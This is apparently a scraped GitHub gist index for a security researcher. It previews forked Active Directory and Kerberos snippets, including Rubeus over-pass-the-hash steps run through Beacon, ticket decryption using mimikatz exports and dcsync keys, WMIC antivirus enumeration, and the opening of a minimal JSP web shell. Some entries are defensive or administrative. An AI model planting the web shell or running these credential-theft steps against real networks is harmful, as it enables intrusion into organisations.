dev2null dev-2null

155 followers · 29 following

Forest
https://dev-2null.github.io

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

dev-2null / New-SYSVOLZip.ps1

Created February 6, 2020 09:45 — forked from HarmJ0y/New-SYSVOLZip.ps1

Compresses all of SYSVOL to a local .zip file.

	function New-SYSVOLZip {
	<#
	.SYNOPSIS

	Compresses all folders/files in SYSVOL to a .zip file.

	Author: Will Schroeder (@harmj0y)
	License: BSD 3-Clause
	Required Dependencies: None

dev-2null / decryptKerbTicket.py

Created March 3, 2020 11:17 — forked from xan7r/decryptKerbTicket.py

Decrypt kerberos tickets and parse out authorization data

	#!/usr/bin/env python
	# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
	# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
	#
	# Recommended Instructions:
	# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
	# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
	# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
	# Run this script to decrypt:
	# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected]

dev-2null / kerberos.md

Created March 3, 2020 11:21 — forked from almaz-uno/kerberos.md

Misc about Kerberos (KRB5) authentication mechanism

http://www.ibm.com/support/knowledgecenter/en/SSAW57_8.5.5/com.ibm.websphere.nd.doc/ae/csec_kerb_auth_explain.html https://www.ibm.com/support/knowledgecenter/SSD28V_8.5.5/com.ibm.websphere.base.doc/ae/tsec_kerb_auth_client.html http://www.ibm.com/support/knowledgecenter/SSAW57_8.5.5/com.ibm.websphere.nd.doc/ae/tsec_kerb_setup.html http://www.ibm.com/support/knowledgecenter/SSCKBL_8.5.5/com.ibm.websphere.nd.multiplatform.doc/ae/rwbs_spnego_tokens_outbound_jaxws_client_bindings.html

http://www.ibm.com/support/knowledgecenter/en/SSAW57_8.5.5/com.ibm.websphere.nd.doc/ae/tsec_kerb_create_conf.html http://www.ibm.com/support/knowledgecenter/SSAW57_8.5.5/com.ibm.websphere.nd.doc/ae/tsec_kerb_create_spn.html

dev-2null / gist:78c36568aed5dca143d4166016bb259f

Created March 3, 2020 11:22 — forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02

Over-pass-the-hash with Rubeus and Beacon

	##### IF ELEVATED:

	# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
	beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

	# decode the base64 blob to a binary .kirbi
	$ base64 -d ticket.b64 > ticket.kirbi

	# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
	beacon> make_token DOMAIN\USER PassWordDoesntMatter

dev-2null / Get-KerberosTicketGrantingTicket.ps1

Created March 4, 2020 13:39 — forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1

Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests

	function Get-KerberosTicketGrantingTicket
	{
	<#
	.SYNOPSIS

	Gets the Kerberos Tickets Granting Tickets from all Logon Sessions

	.DESCRIPTION

	Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.

dev-2null / cmd.jsp

Created May 25, 2020 09:59 — forked from ErosLever/cmd.jsp

A simple and minimal yet effective JSP Web Shell that escapes command output as HTML entities as needed.

	<form method="GET" action="">
	<input type="text" name="cmd" />
	<input type="submit" value="Exec!" />
	</form> <%!
	public String esc(String str){
	StringBuffer sb = new StringBuffer();
	for(char c : str.toCharArray())
	if( c >= '0' && c <= '9' \|\| c >= 'A' && c <= 'Z' \|\| c >= 'a' && c <= 'z' \|\| c == ' ' )
	sb.append( c );
	else

dev-2null / wmic_cmds.txt

Created November 3, 2020 14:23 — forked from xorrior/wmic_cmds.txt

Useful Wmic queries for host and domain enumeration

	Host Enumeration:

	--- OS Specifics ---
	wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

	wmic computersystem LIST full

	--- Anti-Virus ---

	wmic /namespace:\\root\securitycenter2 path antivirusproduct

dev-2null / Get-RBCD.ps1

Last active March 3, 2022 02:27

Powershell one liner to retrieve RBCD information with security descriptors resolved

([adsisearcher]::new(([adsi]"LDAP://OU=OU,DC=domain,DC=net"),"(msDS-AllowedToActOnBehalfOfOtherIdentity=*)")).FindAll()| ForEach-Object {$_.Properties["distinguishedname"]; ConvertFrom-SddlString (New-Object Security.AccessControl.RawSecurityDescriptor([byte[]]$_.Properties["msds-allowedtoactonbehalfofotheridentity"][0],0)).GetSddlForm([Security.AccessControl.AccessControlSections]::Access) | select DiscretionaryAcl|fl}

dev-2null / KDCProxy.ps1

Created February 18, 2022 07:56 — forked from jborean93/KDCProxy.ps1

Functions to help set up a KDC proxy server and add client proxy servers - https://syfuhs.net/kdc-proxy-for-remote-access

	# Copyright: (c) 2022, Jordan Borean (@jborean93) <[email protected]>
	# MIT License (see LICENSE or https://opensource.org/licenses/MIT)

	Function Install-KDCProxyServer {
	<#
	.SYNOPSIS
	Set up a KDC Proxy server.

	.DESCRIPTION
	Sets up the KDC proxy server on the current host.

dev-2null / clr_via_native.c

Last active July 17, 2024 08:42 — forked from xpn/clr_via_native.c

A quick example showing loading CLR via native code

	#include "stdafx.h"

	int main()
	{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

OlderNewer